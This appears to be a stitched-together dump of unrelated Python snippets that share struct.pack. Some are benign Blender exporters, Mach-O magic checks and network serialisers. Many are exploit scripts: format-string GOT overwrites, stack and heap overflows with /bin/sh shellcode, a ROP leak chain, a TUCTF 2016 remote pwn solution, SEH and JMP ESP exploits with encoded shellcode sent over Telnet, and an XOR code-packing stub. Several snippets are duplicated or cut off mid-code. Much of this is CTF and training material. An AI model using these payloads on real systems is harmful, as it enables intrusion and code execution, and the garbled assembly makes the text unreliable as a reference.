def isSupportedFile(cls, fileName):
try:
with open(fileName, 'rb') as f:
magic = f.read(4)
return magic == p('>I', 0xfeedface) or magic == p('>I', 0xfeedfacf) or magic == p('<I', 0xfeedface) or magic == p('<I', 0xfeedfacf)
except BaseException as e:
raise LoaderError(e)
def isSupportedFile(cls, fileName):
try:
with open(fileName, 'rb') as f:
magic = f.read(4)
return magic == p('>I', 0xfeedface) or magic == p('>I', 0xfeedfacf) or magic == p('<I', 0xfeedface) or magic == p('<I', 0xfeedfacf)
except BaseException as e:
raise LoaderError(e)
def var_int_ser(self, mint):
assert mint > 0
assert mint < uint64_max
if mint < 0xff - 2:
return p('B', mint)
elif mint < uint16_max:
return b'\xfd' + p('H', mint)
elif mint < uint32_max:
return b'\xfe' + p('I', mint)
elif mint < uint64_max:
return b'\xff' + p('L', mint)
def export_main(object, file):
mesh = object.data
file.write(p('III', 0x0, 4, 0)) # version block
file.write(p('II', 0x1, len(mesh.polygons) * 44)) # polygons block
for polygon in mesh.polygons:
v1x, v1y, v1z = mesh.vertices[polygon.vertices[0]].co.xzy
v2x, v2y, v2z = mesh.vertices[polygon.vertices[2]].co.xzy
v3x, v3y, v3z = mesh.vertices[polygon.vertices[1]].co.xzy
mat = object.material_slots[polygon.material_index].material
file.write(
p('9fIf', v1x, v1y, v1z, v2x, v2y, v2z, v3x, v3y, v3z,
mat.stalker2sided, mat.stalkerOCC))
def isSupportedFile(cls, fileName):
try:
with open(fileName, "rb") as f:
magic = f.read(4)
return (
magic == p(">I", 0xFEEDFACE)
or magic == p(">I", 0xFEEDFACF)
or magic == p("<I", 0xFEEDFACE)
or magic == p("<I", 0xFEEDFACF)
)
except BaseException as e:
raise LoaderError(e)
def export_som(mesh, path, use2sided=False):
f = open(path, 'wb')
f.write(p('III', 0x0, 4, 0)) # version block
f.write(p('II', 0x1, len(mesh.polygons) * 44)) # polygons block
two_sided, occ = int(use2sided), 0.0
for polygon in mesh.polygons:
v1x, v1y, v1z = mesh.vertices[polygon.vertices[0]].co.xzy
v2x, v2y, v2z = mesh.vertices[polygon.vertices[2]].co.xzy
v3x, v3y, v3z = mesh.vertices[polygon.vertices[1]].co.xzy
tris = p('9f', v1x, v1y, v1z, v2x, v2y, v2z, v3x, v3y, v3z)
option = p('If', two_sided, occ)
f.write(tris + option)
f.close()
def export_som(ob, path):
mesh = ob.data
f = open(path, 'wb')
f.write(p('III', 0x0, 4, 0)) # version block
f.write(p('II', 0x1, len(mesh.polygons) * 44)) # polygons block
for polygon in mesh.polygons:
v1x, v1y, v1z = mesh.vertices[polygon.vertices[0]].co.xzy
v2x, v2y, v2z = mesh.vertices[polygon.vertices[2]].co.xzy
v3x, v3y, v3z = mesh.vertices[polygon.vertices[1]].co.xzy
tris = p('9f', v1x, v1y, v1z, v2x, v2y, v2z, v3x, v3y, v3z)
mat = ob.material_slots[polygon.material_index].material
option = p('If', mat.xray_2_sided, mat.xray_occ)
f.write(tris + option)
f.close()
def ser(self):
self.get_payload()
self.length, self.checksum = self.get_length_checksum()
assert self.magic
assert self.command
return p('Q12sQQ', self.magic, self.command, self.length,
self.checksum) + self.payload
def __init__(self, code_to_protect):
# CPU Disasm
# Address Hex dump Command Comments
# <ModuleEn . E8 00000000 CALL decrypt_stub.00401005
# 00401005 $ 58 POP EAX
# 00401006 . 05 1A000000 ADD EAX,1A
# 0040100B > 8B18 MOV EBX,DWORD PTR [EAX]
# 0040100D . 81FB 12A196B1 CMP EBX,B196A112
# 00401013 . 0F84 06000000 JE decrypt_stub.0040101F
# 00401019 . 8030 F1 XOR BYTE PTR [EAX],F1
# 0040101C . 40 INC EAX
# 0040101D .^ EB EC JMP SHORT decrypt_stub.0040100B
self.decrypt_stub_original = '\xE8\x00\x00\x00\x00' '\x58' '\x05\x1A\x00\x00\x00' '\x8B\x18' '\x81\xFB\x12\xA1\x96\xB1' '\x0F\x84\x06\x00\x00\x00' '\x80\x30\xF1' '\x40' '\xEB\xEC'
# find where the xor key is set
self.idx_xor_key = self.decrypt_stub_original.find('\xf1')
# find where the magic dword is compared
self.idx_magic_dword = self.decrypt_stub_original.find('\x12\xA1\x96\xB1')
# generate a 1byte xor key
self.key = randint(0, 0xff)
# generate a 4bytes magic dword
self.magic_dword = p('<I', randint(0, 0xffffffff))
# protecting the code with a simple xor
self.code_to_protect_xored = ''.join([chr(ord(b) ^ self.key) for b in code_to_protect]) + self.magic_dword
# modify the decrypt stub
self.decrypt_stub = bytearray(self.decrypt_stub_original)
self.decrypt_stub[self.idx_xor_key] = self.key
self.decrypt_stub[self.idx_magic_dword : self.idx_magic_dword + 4] = self.magic_dword
self.decrypt_stub = str(self.decrypt_stub)
def execute(self, context):
startTime = time.time()
path = bpy.context.scene.exportCformDir
path = path.encode(encoding='cp1251')
f = open(path + b'level.cform', 'wb')
f.write(b'\x04\x00\x00\x00')
me = context.scene.objects.active.data
vertCnt = len(me.vertices)
triCnt = len(me.polygons)
f.write(p('II', vertCnt, triCnt))
f.write(p('6f', -100, -100, -100, 100, 100, 100))
for v in me.vertices:
f.write(p('3f', v.co.x, v.co.z, v.co.y))
gameMtl = []
for mat in context.scene.objects.active.data.materials:
gameMtl.append(mat.stalkerMatID)
ob = context.scene.objects.active
for face in me.polygons:
f.write(
p('III', face.vertices[0], face.vertices[2], face.vertices[1]))
vertID = face.vertices[0]
vertex = me.vertices[vertID]
if len(vertex.groups) == 1:
groupID = vertex.groups[0].group
vertexGroup = ob.vertex_groups[groupID]
vertexGroupName = vertexGroup.name
sectorID = int(vertexGroupName)
else:
vertID = face.vertices[1]
vertex = me.vertices[vertID]
if len(vertex.groups) == 1:
groupID = vertex.groups[0].group
vertexGroup = ob.vertex_groups[groupID]
vertexGroupName = vertexGroup.name
sectorID = int(vertexGroupName)
else:
vertID = face.vertices[2]
vertex = me.vertices[vertID]
if len(vertex.groups) == 1:
groupID = vertex.groups[0].group
vertexGroup = ob.vertex_groups[groupID]
vertexGroupName = vertexGroup.name
sectorID = int(vertexGroupName)
f.write(p('HH', gameMtl[face.material_index] | 0xc000, sectorID))
print('total time: {0:.6}'.format(time.time() - startTime))
f.close()
return {'FINISHED'}
def isSupportedContent(cls, fileContent):
"""Returns if the files are valid for this filetype"""
magic = bytearray(fileContent)[:4]
magics = (
p('>I', 0xfeedface),
p('>I', 0xfeedfacf),
p('>I', 0xcafebabe),
p('<I', 0xfeedface),
p('<I', 0xfeedfacf),
p('<I', 0xcafebabe),
)
return magic in magics
def export_main(object, file):
fmtVer = 4
file.write(p('I', fmtVer))
mesh = object.data
vertCnt = len(mesh.vertices)
faceCnt = len(mesh.polygons)
file.write(p('II', vertCnt, faceCnt))
bBox = [
object.bound_box[0][0], object.bound_box[0][2], object.bound_box[0][1],
object.bound_box[6][0], object.bound_box[6][2], object.bound_box[6][1]
]
file.write(p('6f', bBox[0], bBox[1], bBox[2], bBox[3], bBox[4], bBox[5]))
for v in mesh.vertices:
file.write(p('3f', v.co.x, v.co.z, v.co.y))
gameMtl = []
for mat in mesh.materials:
gameMtl.append(mat.stalkerMatID)
for face in mesh.polygons:
file.write(
p('III', face.vertices[0], face.vertices[2], face.vertices[1]))
vertID = face.vertices[0]
vertex = mesh.vertices[vertID]
if len(vertex.groups) == 1:
groupID = vertex.groups[0].group
vertexGroup = object.vertex_groups[groupID]
vertexGroupName = vertexGroup.name
sectorID = int(vertexGroupName)
else:
vertID = face.vertices[1]
vertex = mesh.vertices[vertID]
if len(vertex.groups) == 1:
groupID = vertex.groups[0].group
vertexGroup = object.vertex_groups[groupID]
vertexGroupName = vertexGroup.name
sectorID = int(vertexGroupName)
else:
vertID = face.vertices[2]
vertex = mesh.vertices[vertID]
if len(vertex.groups) == 1:
groupID = vertex.groups[0].group
vertexGroup = object.vertex_groups[groupID]
vertexGroupName = vertexGroup.name
sectorID = int(vertexGroupName)
file.write(p('HH', gameMtl[face.material_index] | 0xc000, sectorID))
#!/usr/bin/python
from struct import pack as p
t1 = p("I", 0x080496f4)
t2 = p("I", 0x080496f6)
s = ''
s += t1
s += t2
s += '\%21818x'
s += '\%12$n'
s += '\%43964x'
s += '\%13$n'
print s
def isSupportedContent(cls, fileContent):
"""Returns if the files are valid for this filetype"""
magic = bytearray(fileContent)[:4]
return magic == p('>I', 0xfeedface) or magic == p('>I', 0xfeedfacf) or magic == p('<I', 0xfeedface) or magic == p('<I', 0xfeedfacf)
break
index += 1
textsec = pe.sections[index].get_data()
md = Cs(CS_ARCH_X86, arch)
nw = ""
addr = pe.sections[index].VirtualAddress
jmptable = []
f = 0
r = 0
j = 0
for i in md.disasm(textsec, 0):
insb = ''.join(format(x, '02x') for x in i.bytes)
if i.mnemonic in topatch:
try:
dest = p("<Q", addr + int(i.op_str, 16))
nwinsb = "cc"
n = 0
while n != (len(i.bytes) - 1):
nwinsb += "90"
n += 1
insb = nwinsb
typ = gettype(i.mnemonic)
jmptable.append(p("<Q", addr + i.address) + p("<Q", typ) + dest)
r += 1
except:
print "Wont patch"
else:
if j % 2 == 0:
jmptable.append(
p("<Q", addr + i.address) +
#!/usr/bin/python
from struct import pack as p
exitgot1 = p("I", 0x08049724)
exitgot2 = p("I", 0x08049724 + 1)
exitgot3 = p("I", 0x08049724 + 2)
exitgot4 = p("I", 0x08049724 + 3)
s = ''
s += exitgot1
s += exitgot2
s += exitgot3
s += exitgot4
s += '\%162x'
s += '\%4$hhn'
s += '\%206x'
s += '\%5$hnn'
s += '\%125x'
s += '\%6$hnn'
s += '\%257x'
s += '\%7$hnn'
print s
shellcode += 'B' * 50
opcion = raw_input(
"\n 1) Run Exploit Ejemplo\n 2) Run Exploit Return\n 3) Run Exploit Seh\n\n > "
)
if opcion == "1":
padding = 'A' * 50
cookie = 'XXXX'
payload = padding + cookie
size = 800
elif opcion == "2":
padding = 'A' * (2512 - len(shellcode))
retorno = p('<I', 0x62601453) # jmp eax help.dll
relleno = 'C' * 150
payload = shellcode + padding + retorno + relleno
size = 680
elif opcion == "3":
padding = 'A' * (1820 - len(shellcode))
nhandler = "\x71\x0B" # jno short 0xb
nhandler += "\x70\x0B" # jo short 0xb
handle = p('<I', 0x6260145E) # ppr help.dll
jmpback = 'B' * 10 + '\xE9\xC5\xFE\xFF\xFF' + 'B' * 10
payload = padding + shellcode + nhandler + handle + jmpback + 'D' * 3000
size = 680
#!/usr/bin/python
from struct import pack as p
#./heap0 `python /tmp/x.py`
winnerret = p("I", 0x08048464)
s = ''
s += 'A' * 72
s += winnerret
print s
#!/usr/bin/python
from struct import pack as p
#./heap1 `/tmp/x.py`
putsgot = p("I", 0x08049774)
winnerpointer = p("I", 0x08048494)
s = ''
s += 'A' * 20
s += putsgot
s += ' '
s += winnerpointer
print s
#!/usr/bin/python
from struct import pack as p
putsgot = p("I", 0x0804b128 - 12) #0x08048796
heapaddr = p("I", 0x804c000 + 8)
sc = 'b864880408ffe0'.decode('hex') # mov eax, 0x08048864; jmp eax
s = ''
s += '\x90' * 12
s += sc
s += ' '
s += 'BBBB' * 7
s += p("I", 0xffffffff)
s += p("I", 0xffffffff)
s += p("I", 0xfffffffc)
s += ' '
s += 'D'
s += putsgot
s += heapaddr
print s
POPRDI = 0x0000000000400c23 # pop rdi ; ret
PLTPUT = 0x00000000004007a0
p0 = subprocess.Popen(['./hellcode'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
raw_input("ready!\n")
payload = "\x68\x10\x08\x40\x00\x54\x5f\x48\x8b\x14\x25\xb0\x20\x60\x00\xc3"
#68 10 08 40 00 push 0x400810
#54 push rsp
#5f pop rdi
#48 8b 14 25 b0 20 60 00 mov rdx, QWORD PTR ds:0x6020b0
#c3 ret
payload += "/bin/sh\x00"
payload += p("<Q", POPRDI)
payload += p("<Q", GOTGETGID)
payload += p("<Q", PLTPUT)
payload += p("<Q", REENTER)
payload += "/bin/sh\x00"
payload += "\x00\x00\x00\x00\x00\x00\x00\x00"
payload += "\x00\x00\x00\x00\x00\x00\x00\x00"
print p0.stdout.readline()
p0.stdin.write(payload+"\n")
d = p0.stdout.readline().split("Please enter your code: ")[1][:-1]
leak = int(d[::-1].encode('hex'), 16)
magic = leak - OFFMAGIC
print "Leak getgid() == " + hex(leak)
print "Magic(execve()) is at == " + hex(magic)
# TUCTF 2016
# especiallygoodjmps (PWN/75)
#
# @a: Smoke Leet Everyday
# @u: https://github.com/smokeleeteveryday
#
from pwn import *
from struct import pack as p, unpack as u
host, port = ('130.211.202.98', 7575)
r = remote(host, port)
# prepare eip + ebp overwrite values
new_eip = p('<I', 0x0804A048) # > 0804A048 meow
new_ebp = p('<I', 0xDEADBEEF)
# prepare shellcode
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# prepare payload
payload = "B"*40 + new_ebp + new_eip + shellcode
# send payload to victim
print r.recvuntil('What\'s your name?\n')
r.sendline(payload)
print r.recvuntil('What\'s your favorite number?\n')
# construct 4-byte trampoline in meow
h = '\x90\x90\xff\xe4' # jmp esp = ff e4
# TUCTF 2016
# especiallygoodjmps (PWN/75)
#
# @a: Smoke Leet Everyday
# @u: https://github.com/smokeleeteveryday
#
from pwn import *
from struct import pack as p, unpack as u
host, port = ('130.211.202.98', 7575)
r = remote(host, port)
# prepare eip + ebp overwrite values
new_eip = p('<I', 0x0804A048) # > 0804A048 meow
new_ebp = p('<I', 0xDEADBEEF)
# prepare shellcode
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# prepare payload
payload = "B" * 40 + new_ebp + new_eip + shellcode
# send payload to victim
print r.recvuntil('What\'s your name?\n')
r.sendline(payload)
print r.recvuntil('What\'s your favorite number?\n')
# construct 4-byte trampoline in meow
h = '\x90\x90\xff\xe4' # jmp esp = ff e4
def isSupportedContent(cls, fileContent):
"""Returns if the files are valid for this filetype"""
magic = bytearray(fileContent)[:4]
return magic == p('>I', 0xfeedface) or magic == p(
'>I', 0xfeedfacf) or magic == p('<I', 0xfeedface) or magic == p(
'<I', 0xfeedfacf)
#!/usr/bin/python
from struct import pack as p
#(python exploit.py ; cat) | ./stack6
pad = "A" * 80
ret = p("I", 0xb7ecffb0)
binsh = p("I", 0xb7fb63bf)
all = pad + ret + "BBBB" + binsh
print all
def ser_payload(self):
return p('Q', nonce)
buf += "\x81\xf2\xb0\xd4\xb2\xfc\x1a\x7d\x5a\x01\xa5\x84\xa2"
buf += "\x8c\x43\xec\xc4\xd8\xdc\x98\x26\x3f\xd5\x3f\x58\x15"
buf += "\x4d\xd7\x11\x7f\x4a\xd8\xa1\x55\xfc\x4e\x2a\xba\x38"
buf += "\x6f\x2d\x97\x68\xf8\xba\x6d\xf9\x4b\x5a\x71\xd0\x3b"
buf += "\xff\xe0\xbf\xbb\x76\x19\x68\xec\xdf\xef\x61\x78\xf2"
buf += "\x56\xd8\x9e\x0f\x0e\x23\x1a\xd4\xf3\xaa\xa3\x99\x48"
buf += "\x89\xb3\x67\x50\x95\xe7\x37\x07\x43\x51\xfe\xf1\x25"
buf += "\x0b\xa8\xae\xef\xdb\x2d\x9d\x2f\x9d\x31\xc8\xd9\x41"
buf += "\x83\xa5\x9f\x7e\x2c\x22\x28\x07\x50\xd2\xd7\xd2\xd0"
buf += "\xe2\x9d\x7e\x70\x6b\x78\xeb\xc0\xf6\x7b\xc6\x07\x0f"
buf += "\xf8\xe2\xf7\xf4\xe0\x87\xf2\xb1\xa6\x74\x8f\xaa\x42"
buf += "\x7a\x3c\xca\x46"
username = '******'
password = '******' + 'a' * 2500
password += p('<I', 0x71401461) # mov ecx,esp/ret
password += p('<I', 0x71401478) # mov esi,ecx/ret
password += p('<I', 0x71401464) # add esi,14h/ret
password += p('<I', 0x71401468) # jmp esi
shellcode = '\x90' * 10
shellcode += buf
shellcode += '\x90' * 10
try:
print "\n Generando conexion a Telnet...\n"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
print " [+] Enviando Username..."
sleep(3)
#!/usr/bin/python
from struct import pack as p
#using cat to keep pipes open
#(python /tmp/exploit.py ; cat) | ./stack5
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
sled = "\x90" * (76 - len(shellcode))
eip = p("I", 0xbffff7c0)
pad = "A" * 76
all = pad + eip + sled + shellcode
print all
buf += "\x10\xfe\xdb\xdc\xea\xb4\xc3\xab\xb7\x68\xf2\x40\xa4"
buf += "\x5d\xbd\x1d\x1f\x15\x3c\xcc\x51\xd6\x0f\xd0\x6e\x84"
buf += "\xeb\x10\xfa\xd2\x32\x5f\x0e\xdc\x73\x8b\xe5\xe5\x07"
buf += "\x68\x2e\x6f\x16\xfb\x74\xab\xd9\x17\xee\x38\xd5\xac"
buf += "\x64\x64\xf9\x33\x90\x12\x05\xbf\x67\xcd\x8c\xfb\x43"
buf += "\x11\xef\xc0\x3e\x21\xc6\x12\xb7\xd7\x91\x59\xa0\x99"
buf += "\xef\x53\xdd\xf4\x07\xf4\xe2\x06\x28\x82\x58\xfd\x6d"
buf += "\xeb\xba\x1f\xe2\x93\x27\xc4\x56\x74\xd9\xfb\xa9\x7b"
buf += "\x6f\x46\x5d\xec\x1c\x25\x7d\xad\xb4\x86\x4f\x03\x21"
buf += "\x81\xda\x28\xcc\x23\x14\x14\x86\x98\x70\xa0\x1e\xc6"
buf += "\x2e\x4b\x75\x03\x47\x71\x26\xb0\xff\xd4\x8a\x7a\x78"
buf += "\x04\x31\xd1\x6e\x6a\xc6\x2a\x91\xfd\x56\xb2\x35\xde"
buf += "\xce\x53\xac\x6a\x66\xc4\x4b\xeb\x08\x78\xa2\xd0\x61"
buf += "\xdc\xe0\xec\xf8\x3e\x80\xa8\xda\xe0\x70\x21\x6b\x96"
buf += "\x1e\xd5\xba\x91\x56\x59\x99\x25\xef\x83\xd0\xf7\xbd"
buf += "\x10\x42\xaa\xbe\x47\x55\x8a\x10\x97\xc3\x02"
buf += '\x41' * 20
minirop = '\x83\xEC\x7F' * 4 # SUB ESP,0x7F
minirop += '\xFF\xD4' # CALL ESP
active = '-'
padd = '\x41' * (1055 - len(buf))
retn = p('<I', 0x6D881457) # JMP ESP
basura = '\x41' * 5
payload2 = active + padd + buf + retn + minirop
stdin.write(payload2 + '\n')
print stdout.read(1024)
